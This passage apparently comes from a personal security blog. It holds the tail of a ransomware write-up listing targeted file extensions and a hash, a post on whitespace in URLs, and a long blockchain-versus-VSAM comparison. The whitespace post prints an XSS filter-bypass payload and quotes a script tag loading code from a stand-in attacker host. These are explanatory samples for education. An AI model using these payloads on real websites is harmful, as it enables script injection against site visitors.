  2. Execute command dir / b / s / x generate the file inventory list then save in encrypted format with naming convention 443.exe. Evil make use of ready make solution. Yes, it is a JavaScrypt (Browser-Based Cryptography Tools). JavaScrypt’s encryption facilities use the Advanced Encryption Standard (AES) adopted by the United States as Federal Information Processing Standard 197. JavaScrypt uses 256 bit keys exclusively.
  3. Key generation and encryption (Remark: below details is intended to provide concept for education only.

Encrypted extension:

*.doc *.xls *.pub *.odt *.ods *.odp *.odm *.odc *.odb*.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd *.rtf *.wb2 *.mdf *.dbf *.psd *.pdd *.eps *.ai *.indd *.cdr img_*.jpg *.dng *.3fr *.arw *.srf *.sr2 *.bay *.crw *.cr2 *.dcr *.kdc *.erf *.mef *.mrw *.nef *.nrw *.orf *.raf *.raw *.rwl *.rw2 *.r3d *.ptx *.pef *.srw *.x3f *.der *.cer *.crt *.pem *.pfx *.p12 *.p7b *.p7c

Hash sample: 1817853fdaf2d35988ca22a6db2c939e0f56664576593d325cfd67d24e8fb75c

Current status: 24th Jan 2017

No worries, most popular of antivirus programs are able to detect Devil ransomeware.

For example: Kaspersky,F-Secure,Symantec,TrendMicro. How about Mcafee. It looks that their signature do not have coverage.

To be RFC 3986 or not to be RFC 3986

Heard that new discovered phishing technique can fool tech-savvy people. The bad guy conducted a technique so called white space in URL in cyber space. The objective is mislead the computer users includes savvy technical persons. But we are not going to focus how was hackers use phishing email compromise victim workstation in this article. But base on their hack technique raised of my reflections to address the white space fundamental issues. As we know, the white space in url alerted by RFC 1738 many years ago. The RFC 1738 has been replaced by RFC 3986. The concept were told that there is technical limitation of space character. On RFC 1738 article, it highlight that the space character is unsafe because significant spaces may disappear and insignificant spaces may be introduced when URLs are transcribed or typeset or subjected to the treatment of word-processing programs. Be my guest, let take a closer looks of this story.

Normally format HTML will have spaces in between them.

HTML

<nav>
  <a href="#">Peter</a>
  <a href="#">Paul</a>
  <a href="#">Mary</a>
</nav>

CSS

nav a {
  display: inline-block;
  padding: 5px;
  background: Red;
}

Output

What if the URI allowed to contain one or more space characters, is there any hesitation in this area? Do you think the hacker can utilize this invisible place to to do their bad things?

  1. A space position in the character set is 20 hexadecimal. The space character is unsafe because significant spaces may disappear and insignificant spaces may be introduced when URLs are transcribed or typeset or subjected to the treatment of word-processing programs.
  2. A space has to be replaced with a %20 instead. This makes the filename part of the URL less readable and, thus, makes people avoid it in the first place.

Example: whitespace hack

//Start HTML
<html>
<body>
<img/*comment*/src="javascript:alert('img tag')">
</body>
</html>
//End HTML

Result: Some script tags are allowed but <img src=”something”> is not. By replacing the whitespace with a comment, your code is accepted.

It looks that a reverse engineering can change a simple character to become a silent killer. Whitespace just means characters which are used for spacing, and have an “empty” representation. But whitespace jump into python world it will become a cyber weapon.The python community usually follows PEP8 style, which prescribes indentation of four spaces.Whitespace is significant in Python source code. From technical point of view, there are more room space let you guys develop more, right?

As said, whitespace can become a silent killer. However all depends on handler how to use it. He will become a accomplice. This week headline news report that Gmail Phishing Scam Stealing Credentials Through Infected Attachment. Heard that it involved whitespace in url. A space has to be replaced with a %20 instead. This makes the filename part of the URL less readable and, thus, makes people avoid it in the first place. I thought it also involves cross-site scripting technique. Below example quoted that one source is inserting code into pages sent by another source. Sound like OWASP Top 5 items, a cross-site scripting scenario.

<A HREF="http://Goodguy.org/search.cgi?criteria=<SCRIPT SRC='http://badguy.org/infection.js'></SCRIPT>"> Go to Goodguy.org</A>

 

Descendant of VSAM File Organization,that is blockchain technology today

Old school boy might remember fundamental of Virtual storage access method (VSAM). I object, banking and financial institution are close with VSAM technologies day to day. Yes, they are using mainframe computer. For instance IBM S390. People discontentment of proprietary payment solution (SWIFT) sounds high! Hackers targeted payment system via the SWIFT, no significant figures show the security weakness of traditional payment system (SWIFT). Do you think the exploit come from fundamental design or it is the operation weakness? The block chain technology (bitcoins) carry out challenge to traditional payment method. For sure that it is a long run of competition. It includes intangible factors. Example: political, conflict of interest on business side, renovation of traditional payment culture,…etc.

Descendant of VSAM File structure,that is blockchain conceptual technology today

Blockchain technology – who is who?

Blockchain technology confusing me! What is bitcoin blockchain? Or it is Ethereum technology? But heard that there is another digital currencies or digital token. Oh! my god, still have smart contracts! Find the answer conclude that it is list of transactions that is replicated across a number of computers.

i. Blockchain keep track of a currency’s balances.Since it is a decentralized networks, blockchain does not have a central point of failure and is better able to avoid malicious attacks.

ii. Ethereum is an public blockchain-based distributed application platform featuring smart contract functionality.

iii. A smart contract is a digitally signed, computable agreement between two or more parties. A virtual third party work as software agent to execute and enforce at least some of the terms of such agreements.

iv. Digital tokens being used to represent different assets on a blockchain.

The overall opinion of people feel that BlockChain technologies are advanced compare with traditional payment method. See below diagram, the layering architecture of blockchain not special. If you take a closer look and focus in blockchain and share data storage layer. You will feel that blockchain design concept like IBM Mainframe VSAM file organization structure.

From design point of view, VSAM structure consists of tables, columns, primary keys, indexes, stored procedures, and views (refer to below left hand side diagram). When a direct READ is performed for a VSAM indexed file, based on an alternate index for which duplicates exist, only the first record in the data set (base cluster) with that alternate key value is retrieved. You need a series of READ NEXT statements to retrieve each of the data set records with the same alternate key.

How about block chain design structure? The terminology so called terms includes Transactor, Transaction, Ledger,World stat, Chaincode, Validating peer, Non-validating peer, Consensus and Permissioned network (refer to below right hand side diagram).

Descendant of VSAM File Organization,that is blockchain technology today.

Blockchain Key terms (copy from IBM Bluemix Docs)

The following terms are instrumental in gaining a holistic understanding of blockchain concepts:

Transactor: A network participant connected to the blockchain network through a node, who submits transactions from a client using an SDK or API.

Transaction: A request by a transactor to execute a function on the blockchain network. The transaction types are deploy, invoke, and query, which are implemented through the chaincode functions set forth in the fabric’s API contract.

Ledger: A sequence of cryptographically-linked blocks, containing transactions and the current world state. In addition to data from previous transactions, the ledger also contains the data for currently-running chaincode applications.

World state: Key-value database used by chaincodes to store their state when executed by a transaction.

Chaincode: Embedded logic that encodes the rules for specific types of network transactions. Developers write chaincode applications and deploy them to the network. End users then invoke chaincode through a client-side application that interfaces with a network peer, or node. Chaincode runs network transactions, which if validated, are appended to the shared ledger and modify world state.

Validating peer: A network node that runs the consensus protocol for the network to validate transactions and maintain the ledger. Validated transactions are appended to the ledger, in blocks. If a transaction fails consensus, it is purged from the block and therefore, not written to the ledger. A validating peer (VP) has authority to deploy, invoke and query chaincode.

Non-validating peer: A network node that functions as a proxy, connecting transactors to validating peers. A non-validating peer (NVP) forwards invocation requests to its connected validating peer (VP). It also hosts the event stream server and the REST service.

Consensus: A protocol that maintains the order of blockchain network transactions (deploy and invoke). Validating nodes work collectively to approve transactions by implementing the consensus protocol. Consensus ensures that a quorum of nodes agree on the order of transactions on the shared ledger. By resolving any discrepancies in this order, consensus ensures that all nodes operate on an identical blockchain ledger. See the consensus topic for more information and test cases.

Permissioned network: A blockchain network where each node is required to maintain a member identity on the network, and each node has access to only the transactions that its permissions allow.

For readers who are interested of block chain technology. Please refer below url for reference.

About blockchain (IBM Bluemix Docs)

https://console.ng.bluemix.net/docs/services/blockchain/ibmblockchain_overview.html

Merry Christmas!